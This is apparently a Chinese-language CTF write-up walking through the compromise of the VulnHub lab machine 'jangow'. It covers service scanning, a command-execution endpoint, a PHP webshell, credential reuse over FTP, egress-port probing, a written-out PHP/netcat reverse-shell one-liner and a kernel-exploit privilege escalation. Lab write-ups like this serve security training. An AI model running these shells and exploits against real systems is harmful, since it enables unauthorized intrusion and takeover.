Week2_____WP
题目来源:Vulnerable By Design ~ VulnHub
题目:jangow.ova
题目类型:渗透靶机
解题过程:
靶机地址:192.168.3.11
攻击机: 192.168.3.20
- 扫描开放的服务(nmap)
- 访问ftp试一下
发现访问不了,没有可以利用的信息
访问http
3.1发现buscar有可疑接口,可以执行系统命令
3.2一句话木马,蚁剑成功连接
浏览目录,发现一些信息
3.3分别用搜集到的信息登录ftp
最终用
$username = "jangow01";
$username = " abygurl69";
登录成功
登录了,发现就是网站目录
好像没啥用
4连接
在kali上绑定端口用来探测开放的端口
sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65535 -j REDIRECT --to-port 666
写一个探测端口的脚本666.sh
for i in {400..450};
do
timeout 1 nc -vz 192.168.3.20 $i && echo "$i open" >> result.txt || echo "$i closed" >> 666result.txt;
done
在蚁剑中修改权限并运行它
查看结果:发现443端口可用
写一个反弹shell
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.20 443 >/tmp/f');?>
访问一下
升级一下可交互式shell,先检查一下python3再升级
在home目录下发现一个user.txt文件:
5.提权
查看一下系统版本,看看有没有可利用的漏洞:
靶机环境是ubuntu16.04,使用 searchsploit 看看有没有什么可利用的漏洞
发现 45010.c ,看一下怎么利用:
利用ftp上传文件
需要切换到jangow01用户,然后利用gcc 编译
Root目录下有flag